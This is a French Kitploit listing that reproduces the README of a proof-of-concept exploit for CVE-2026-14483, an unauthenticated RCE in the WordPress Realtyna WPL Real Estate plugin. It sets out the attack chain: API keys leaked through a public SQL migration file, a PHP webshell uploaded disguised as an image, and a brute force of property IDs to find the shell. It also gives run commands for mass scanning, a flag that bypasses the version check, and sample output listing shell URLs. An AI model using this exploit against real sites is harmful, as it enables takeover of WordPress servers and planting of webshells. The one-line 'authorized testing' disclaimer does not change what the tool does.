Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT PAR MADEXPLOITS | Kitploit
Outils/GitHubGitHub/madexploits/cve-2026-14483
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT PAR MADEXPLOITS

Voir le dépôt
12il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-14483 — WPL Real Estate RCE

Exécution de code à distance non authentifiée contre le plugin WordPress Realtyna WPL Real Estate Listing.

Télécharger l’outil
ChampDétail
CVECVE-2026-14483
Version affectée<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
ImpactTéléversement de webshell PHP non authentifié (RCE)
ScriptCVE-2026-14483.py
AuteurMADEXPLOITS

Par défaut, le script n'exploite que les cibles exécutant WPL 5.2.0. Utilisez --force pour outrepasser.

IMAGE


Résumé de la vulnérabilité

  1. Fuite d'identifiants — L'api_key / api_secret par défaut sont exposés via un dump public de migration SQL.
  2. Téléversement non authentifié — Ces identifiants authentifient l'API I/O WPL (set_property), permettant de téléverser un fichier PHP conçu comme image de propriété.
  3. Découverte du webshell — Le webshell téléversé se trouve sous wp-content/uploads/WPL/{property_id}/.

Prérequis

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Accès réseau à la ou aux cibles

Utilisation

Liste de cibles

Créez un fichier texte avec une URL de base par ligne :

root@kitploit:~
http://wplab.test
https://example.com

Exécution de base

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

Les URL de shells valides sont ajoutées à result.txt (ou à --output).

Options complètes

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
ArgumentDéfautDescription
--targets(requis)Fichier contenant les URL de base (une par ligne)
--outputresult.txtFichier dans lequel ajouter les URL de shells trouvés
--user-id1ID utilisateur WordPress / WPL propriétaire de la nouvelle propriété
--payloadshell de téléversement intégréChaîne de payload PHP personnalisée
--max-id1000ID de propriété maximal à bruteforcer pour localiser le shell
--timeout30Délai d'expiration HTTP en secondes
--threads5Nombre de threads de travail concurrents
--debugdésactivéJournalisation de débogage verbeuse
--forcedésactivéExploiter même si la version ≠ 5.2.0 ou si la version ne peut pas être détectée

Déroulement de l'exploitation

root@kitploit:~
URL cible
    │
    ▼
Détecter la version de WPL (readme.txt / wpl.php)
    │  ignorer sauf si == 5.2.0 (ou --force)
    ▼
Récupérer api_key + api_secret depuis :
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via l'API I/O WPL
  (téléverser image_0x89MADEXPLOITS.php en tant que image/jpeg)
    │
    ▼
Bruteforce de l'ID de propriété 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Écrire l'URL du shell → fichier de sortie

Marqueur de shell par défaut : MADEXPLOITS
Nom de fichier distant par défaut : 0x89MADEXPLOITS.php


Exemples

Cible de laboratoire unique (cet espace de travail) :

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Scan massif avec une concurrence plus élevée :

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Forcer l'exploitation lorsque la vérification de version échoue :

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Sortie

root@kitploit:~
[+] Shell trouvé : http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progression : 1/1 | Trouvés : 1
[+] Terminé. 1 shell(s) trouvé(s). Consultez 'result.txt' pour les URL.

result.txt contient une URL de shell par ligne.


Remarques

  • La version est lue depuis Stable tag: / Version: dans le readme.txt du plugin, avec repli sur wpl.php.
  • Si le shell n'est pas trouvé après le téléversement, augmentez --max-id.
  • Conçu uniquement pour des tests de sécurité autorisés / une utilisation en laboratoire local.